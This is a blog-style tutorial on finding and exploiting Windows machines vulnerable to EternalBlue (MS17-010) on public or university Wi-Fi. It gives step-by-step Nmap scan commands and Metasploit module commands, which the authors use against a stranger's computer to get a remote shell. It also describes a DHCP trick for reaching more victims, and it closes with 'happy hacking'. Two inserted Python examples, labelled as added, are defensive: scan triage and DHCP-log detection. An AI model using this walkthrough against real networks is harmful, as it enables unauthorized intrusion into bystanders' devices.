How to use EternalBlue to Exploit SMB Port using Public Wi-Fi

Melvin Ismanto (AlienScavenger)
8 min read · Jun 18, 2019


In this article, we will walk through how to penetrate someone’s computer and gain control over it. There are various ways to penetrate a system, but in this article we will focus on exploits against SMB port 445.

(Disclaimer: Everything that we do here is most likely ILLEGAL in any country, thus we do NOT recommend that anyone replicate what we did. This is for our academic purposes only. No personal devices or information were harmed, shared or used for our own benefit. We fully respect every device that we try to hack, and will try our best not to damage it or disturb the owner.)

Table of Contents

  • Introduction about SMB
  • EternalBlue Exploit
  • Metasploit Framework
  • Requirement
  • Methodology

Introduction about SMB

SMB stands for Server Message Block (also known as Common Internet File System, or CIFS). It uses port 445 and operates as an application-layer network protocol, primarily used to offer shared access to files, printers, serial ports and other sorts of communication between nodes on a network. Most use of SMB involves computers running Microsoft Windows.

Malicious hackers know that port 445 is vulnerable and has had many insecurities. SMB is a network file sharing protocol that “allows applications on a computer to read and write to files and to request services” that are on the same network.

Microsoft rates the security update it issued as Critical, and following WannaCry it released a rare Windows XP patch, after having officially ended support for that software in 2014.

Variants of the SMB protocol have improved the original implementation’s capabilities, scalability, security and efficiency. Here is a brief overview of the versions of SMB on Windows:

  • CIFS: The old version of SMB, which was included in Microsoft Windows NT 4.0 in 1996.
  • SMB 1.0 / SMB1: The version used in Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2.
  • SMB 2.0 / SMB2: The version used in Windows Vista and Windows Server 2008.
  • SMB 2.1 / SMB2.1: The version used in Windows 7 and Windows Server 2008 R2.
  • SMB 3.0 / SMB3: The version used in Windows 8 and Windows Server 2012.
  • SMB 3.02 / SMB3: The version used in Windows 8.1 and Windows Server 2012 R2.
  • SMB 3.1: The version used in Windows Server 2016 and Windows 10.

EternalBlue Exploit

As mentioned before, this article focuses on EternalBlue, an exploit that takes advantage of a bug in the SMB protocol. EternalBlue (patched by Microsoft via MS17-010) targets a security flaw in how a Windows SMB 1.0 server handles certain requests.

Multiple versions of Windows are vulnerable to EternalBlue. “The severity ratings indicated for each affected software assume the potential maximum impact of the vulnerability,” states the Microsoft Security Bulletin.

The company’s security page lists Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, Windows 10 and Windows Server 2016 as all being impacted by the EternalBlue exploit. However, Windows 7 and below are the main target of this article.

Metasploit Framework

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known open-source sub-project, the Metasploit Framework, is a penetration testing framework that makes hacking simpler and easier. It is a tool for developing and executing exploit code against a remote target machine. The basic steps for exploiting a system using the Framework are:

  1. Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and Mac OS X systems are included);
  2. Optionally checking whether the intended target system is susceptible to the chosen exploit;
  3. Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a reverse bind shell to create a session with the victim);
  4. Executing the exploit and delivering the payload to the victim’s device.

Requirement

We’ll be using Kali Linux for this article, since the tools we need are already preinstalled, but this should work fine on most Linux distros. So if you haven’t installed Linux already, go install it now. Since we want to try this on a real network, we dual-booted Linux instead of installing it in a virtual machine. This way, we have direct access to our network interface (Wi-Fi).

Otherwise, if you want to try it in a virtual machine, you can do that using either VMware or VirtualBox. Just make sure that you install the OS on two virtual machines: one as the attacker, and one as the target.

Before we move on to the hacking process, we expect you to already have Nmap and Metasploit installed on your Linux system. You can go to their websites for more information on how to install them.

Methodology

The way we are going to conduct our hack is by going to a public area with public Wi-Fi; it doesn’t matter whether the Wi-Fi is open or secured (password-protected). In our case, we will be using the university Wi-Fi to look for our target. The main steps of this hacking process are as follows:

  1. Connect to the public Wi-Fi and check your network IP
  2. Search for vulnerable devices using Nmap
  3. Try to exploit the vulnerable device using Metasploit

Check your network IP

First, check which network you are currently on. On Linux, run the command “ifconfig” and look at the number after “inet”. That is your current IP on the network. Take just the first three octets of the address (in this case, 172.16.166.*). Keep this number in mind, or just copy and paste it into a note.

ifconfig command

Scanning Vulnerability

For scanning the network, we will use a popular network scanning tool called Nmap. It is used by many pentesters (and the not-so-good ones) to identify vulnerable devices on a network. This is the first step of many hacking processes: reconnaissance, or scanning.

Nmap provides various scripts to identify the vulnerability state of specific services. For our purpose, Nmap has a built-in script to identify devices vulnerable to the SMB exploit. The Nmap Scripting Engine (NSE) is one of Nmap’s most powerful features. It allows users to run the simple scripts distributed with Nmap, or to write their own to fulfil their needs.

Scanning with Nmap

# nmap -p 445 --open --script "smb-vuln*" 172.16.182.*

Let’s start by typing the command above into the Nmap command box (we will be using the GUI version of Nmap, also known as Zenmap, for this guide, because it’s easier to look at). The command is actually made up of several options.

As we can see here, we are using “-p 445”, meaning we’re only looking at SMB port 445, and we’re also using “--open” so that Nmap only reports ports that are open (this way we know we can send packets to them).

The option “--script smb-vuln*” runs the scripts built into Nmap that also check whether the host is vulnerable to known SMB flaws. From the picture above, the target is exploitable via MS17-010, which means we can use EternalBlue to hack into it.

The last argument is the range of IPs we will be scanning. This is the IP you copied earlier, that is, your current network. The asterisk means that we are going to scan every possible value of that last octet.

(Note that for this scan we had moved our laptop to a different place, which means we were connected to a different Wi-Fi. That made our laptop receive a different IP address from the DHCP server than the one we had at the time of the first screenshot. Sorry for the confusion.)
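The network’s owner usually wants the result of that same scan as a list rather than as Zenmap screens, so that hosts Nmap flagged can be patched with MS17-010 or have SMBv1 turned off. The following is an added example, not code from the original article: it reads the XML report Nmap writes when the scan above is run with “-oX scan.xml”, and lists each host’s open ports and any MS17-010 finding. The sample report embedded in the script is constructed for the example and only approximates the shape of Nmap’s real XML (addresses, hosts and the script table are assumed, not taken from a real scan).

```python
# Added example (not part of the original article): summarise an Nmap XML report
# from "nmap -p 445 --open --script smb-vuln* -oX scan.xml <range>" so a network
# owner can see which hosts were reported VULNERABLE to MS17-010.
import sys
import xml.etree.ElementTree as ET

# Constructed sample report. Assumption: it mimics the layout of Nmap's XML for a
# host-level NSE script (host -> hostscript -> script -> table -> elem); a real
# report carries many more attributes than shown here.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p 445 --open --script smb-vuln* 172.16.182.*">
  <host>
    <status state="up"/>
    <address addr="172.16.182.159" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="172.16.182.23" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_hosts(xml_text):
    """Return one dict per host: its IPv4 address, open ports and (script id, table key)
    pairs for every NSE result whose state says VULNERABLE (but not NOT VULNERABLE)."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue  # skip hosts without an IPv4 address (e.g. MAC-only entries)
        open_ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                open_ports.append(int(port.get("portid")))
        vulns = []
        for script in host.findall("hostscript/script"):
            for table in script.findall("table"):
                state = table.find("elem[@key='state']")
                text = (state.text or "") if state is not None else ""
                if "VULNERABLE" in text and not text.startswith("NOT"):
                    vulns.append((script.get("id"), table.get("key")))
        hosts.append({"ip": addr.get("addr"), "open_ports": open_ports, "vulns": vulns})
    return hosts


def vulnerable_hosts(xml_text, script_id="smb-vuln-ms17-010"):
    """Sorted list of IPs that the given NSE script reported as vulnerable."""
    return sorted(h["ip"] for h in parse_hosts(xml_text)
                  if any(sid == script_id for sid, _ in h["vulns"]))


def summarize_scan(xml_text):
    """One human-readable line per host: open ports plus any vulnerability finding."""
    lines = []
    for h in parse_hosts(xml_text):
        findings = ", ".join(f"{sid} ({key})" for sid, key in h["vulns"])
        lines.append(f"{h['ip']}: open ports {h['open_ports']}; "
                     f"{findings or 'no vulnerability reported'}")
    return lines


if __name__ == "__main__":
    # Usage: python triage.py scan.xml   (falls back to the constructed sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as f:
            report = f.read()
    else:
        report = SAMPLE_XML
    print("\n".join(summarize_scan(report)))
    print("Flagged for MS17-010 remediation:", vulnerable_hosts(report))
```

The second host in the sample has port 445 open but no script table, which is how a host that passed the check appears in a real report: the vulns library only emits a table when it has something to say, so an absent table means "not reported", not "safe".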

Metasploit

We already know that the target is vulnerable to MS17-010 (code name EternalBlue), and we can use a program called Metasploit to exploit it. Next we will run the following module and commands, which directly exploit the target machine.

First, run Metasploit by opening a new terminal window and typing the command: msfconsole. (Sorry, no screenshot.)

Fig. 2

Then we have to find the appropriate exploit in the huge library that Metasploit has.

msf > use exploit/windows/smb/ms17_010_eternalblue

The next step is to set RHOSTS, which is the IP address of the target.

msf > set rhosts 172.16.182.159

Finally, just type “exploit” and hope that the hack works. If not, you can try again one or two more times.

Fig. 3

We have successfully accessed the remote machine’s shell, as shown in the image above (Fig. 3).

Fig. 4

To make sure we really have access to the target machine, we move to a few other directories (Fig. 4).

Additional Information

The hard part of this process is not the hacking, but the information gathering. It is NOT easy to find a compatible (read: vulnerable) computer to hack into. Even though we are connected to a university network, which in theory should consist of thousands of hosts, we are actually limited to our class C subnet (e.g. 192.168.0.[0–254]). So to extend our coverage, we need to find a way to change our IP so that we also cover the class B range (i.e. 192.168.[0–254].[0–254]).

The university we tested on uses a DHCP server to give out IPs to the clients connected to it. We found a way (at least on Linux) to request a specific IP from the DHCP server. The steps we took are as follows:

  • Open the file “/etc/dhcp/dhclient.conf”
  • Add “send dhcp-requested-address xx.xx.xx.xx;” to the end of the file, where xx.xx.xx.xx is the IP you want to request.
  • Open a new terminal
  • Run the following commands (the first releases the current lease, the second asks for a new one in the foreground using that config file):
    # dhclient -r -v
    # dhclient -4 -d -v -cf /etc/dhcp/dhclient.conf wlan0

If the DHCP server doesn’t respond with a lease, that means it can’t provide you with that IP. Change the address and try again until you find one that is allowed.
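Seen from the DHCP server, the procedure above looks like one client releasing its lease and then asking for a series of addresses that are off its subnet, each answered with a DHCPNAK. The following is an added example, not code from the original article, of how the operator of an ISC dhcpd server could spot that pattern in syslog: it groups DHCPREQUEST and DHCPNAK lines by client MAC and flags any client that asks for several distinct addresses, or collects repeated NAKs, inside a short window. The log lines embedded in the script are constructed for the example and only follow the general shape of dhcpd’s messages; the MAC addresses, hostnames and thresholds are assumptions.

```python
# Added example (not part of the original article): detect a DHCP client that is
# hunting for addresses outside its own subnet, using ISC dhcpd syslog lines.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. Assumption: the lines follow the general shape of ISC
# dhcpd messages ("DHCPREQUEST for <ip> from <mac> via <if>", "DHCPNAK on <ip> to
# <mac> via <if>"); the MACs and addresses are made up for the example.
SAMPLE_LOG = """\
Jun 18 10:01:02 dhcp-srv dhcpd[1234]: DHCPREQUEST for 172.16.182.40 from 00:11:22:33:44:55 via wlan0
Jun 18 10:01:02 dhcp-srv dhcpd[1234]: DHCPACK on 172.16.182.40 to 00:11:22:33:44:55 via wlan0
Jun 18 10:03:10 dhcp-srv dhcpd[1234]: DHCPREQUEST for 172.16.182.77 from 3c:52:82:aa:bb:cc via wlan0
Jun 18 10:03:10 dhcp-srv dhcpd[1234]: DHCPACK on 172.16.182.77 to 3c:52:82:aa:bb:cc via wlan0
Jun 18 10:05:30 dhcp-srv dhcpd[1234]: DHCPRELEASE of 172.16.182.77 from 3c:52:82:aa:bb:cc via wlan0 (found)
Jun 18 10:05:31 dhcp-srv dhcpd[1234]: DHCPREQUEST for 172.16.10.5 (172.16.182.1) from 3c:52:82:aa:bb:cc via wlan0: wrong network.
Jun 18 10:05:31 dhcp-srv dhcpd[1234]: DHCPNAK on 172.16.10.5 to 3c:52:82:aa:bb:cc via wlan0
Jun 18 10:06:02 dhcp-srv dhcpd[1234]: DHCPREQUEST for 172.16.11.5 (172.16.182.1) from 3c:52:82:aa:bb:cc via wlan0: wrong network.
Jun 18 10:06:02 dhcp-srv dhcpd[1234]: DHCPNAK on 172.16.11.5 to 3c:52:82:aa:bb:cc via wlan0
""".splitlines()

# Only REQUEST and NAK lines matter for this check; ACK/RELEASE lines do not match.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dhcpd(?:\[\d+\])?: "
    r"DHCP(?P<msg>REQUEST|NAK) (?:for|on) (?P<ip>\d+(?:\.\d+){3}).*?"
    r"(?:from|to) (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
)


def parse_events(lines):
    """Return (timestamp, mac, 'REQUEST'|'NAK', ip) tuples for matching log lines.
    Syslog timestamps carry no year, so they parse as year 1900; deltas still work."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        events.append((ts, m.group("mac"), m.group("msg"), m.group("ip")))
    return events


def find_address_hunters(lines, window=timedelta(minutes=10),
                         min_distinct=3, min_naks=2):
    """Flag each MAC that, within `window`, requested at least `min_distinct`
    different addresses or received at least `min_naks` NAKs (assumed thresholds)."""
    by_mac = defaultdict(list)
    for ev in parse_events(lines):
        by_mac[ev[1]].append(ev)
    findings = []
    for mac, evs in by_mac.items():
        evs.sort()
        for i, (start, _, _, _) in enumerate(evs):
            win = [e for e in evs[i:] if e[0] - start <= window]
            requested = {ip for _, _, msg, ip in win if msg == "REQUEST"}
            naks = sum(1 for _, _, msg, _ in win if msg == "NAK")
            if len(requested) >= min_distinct or naks >= min_naks:
                findings.append({"mac": mac,
                                 "distinct_requested": len(requested),
                                 "naks": naks,
                                 "first_seen": start.strftime("%b %d %H:%M:%S")})
                break  # one finding per client is enough
    return findings


if __name__ == "__main__":
    for f in find_address_hunters(SAMPLE_LOG):
        print(f"{f['mac']}: {f['distinct_requested']} distinct addresses requested, "
              f"{f['naks']} NAKs, first seen {f['first_seen']}")
```

A single off-subnet request is normal for a laptop that just moved between networks (it asks for the address it last held), which is why the check needs several distinct requests or repeated NAKs before it flags a client; the first client in the sample, with one request and one ACK, is left alone.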

Closing Words

As you can see, it is not as complex as some people might think. Metasploit makes hacking really simple, and even fun!

There you go, guys; we hope you found this article helpful and informative, and happy hacking!

References

[1] Chandel, Raj (January 10, 2019). “SMB Penetration Testing (Port 445)”. Hacking Articles. https://www.hackingarticles.in/smb-penetration-testing-port-445/

[2] https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for

[3] https://blog.trendmicro.com/trendlabs-security-intelligence/ms17-010-eternalblue/

[4] https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

[5] https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue

[6] https://www.metasploit.com/
